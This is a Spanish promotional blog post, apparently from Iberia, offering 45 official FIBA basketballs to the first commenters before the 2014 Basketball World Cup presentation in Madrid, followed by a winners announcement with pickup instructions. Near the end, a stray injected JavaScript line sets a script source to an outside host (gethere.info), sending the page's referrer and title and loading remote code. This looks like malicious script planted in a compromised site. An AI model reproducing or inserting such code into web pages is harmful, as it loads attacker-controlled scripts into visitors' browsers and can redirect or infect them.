¿Os gustaría conseguir un balón de baloncesto de la FIBA?

27/06/2013

Mundo Basket 2014

Iberia colabora en la presentación de la Copa del Mundo de Baloncesto FIBA #Spain2014 que tendrá lugar el próximo 1 de julio en la Puerta del Sol de Madrid y por ello, nos gustaría haceros partícipes del evento a todos vosotros a través del regalo de 45 balones oficiales de la FIBA.

¿Estáis en Madrid y os gustaría conseguir uno? Si vuestra respuesta es sí, estáis de enhorabuena porque los 45 primeros que comentéis este post indicándonos que sí deseáis uno de los balones de la FIBA, ¡os lo regalamos! Rápido que solo hay 45 :).

Tenéis desde ahora hasta las 23:59 horas de hoy día 27 de junio para apuntaros. Los 45 primeros que dejen su comentario junto con su nombre y apellidos, los incluiremos en una lista y ¡serán los ganadores! Para poder recoger el balón, deberán acercarse el próximo día 1 de julio entre las 11:00 horas y las 21:30 horas a la Puerta del Sol con su DNI para recogerlo. ¡Esperamos vuestros comentarios! 😉

Nota: Dado que los comentarios requieren autorización por parte del gestor del blog, es posible que no los veáis publicados al momento pero, los comentarios serán publicados por orden cronológico a medida que se vayan recibiendo.

————————

¡Ya tenemos ganadores de nuestro sorteo de balones de baloncesto de la FIBA!

Antes que nada, queremos agradecer a todos vuestra participación y esperamos contar con vosotros en futuras promociones 🙂

A continuación veréis el listado con los seguidores que nos han escrito los 45 primeros comentarios indicando también su nombre y apellidos y que, así, han conseguido un balón de baloncesto oficial de la FIBA.

¡Enhorabuena!

Para poder recoger el balón, deberéis ir el próximo día 1 de julio entre las 11:00 horas y las 21:30 horas a la Puerta del Sol con vuestro DNI para recogerlo.

Balon1Balon2

 s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + »;

ARTÍCULOS RELACIONADOS
COMPARTE ESTE ARTÍCULO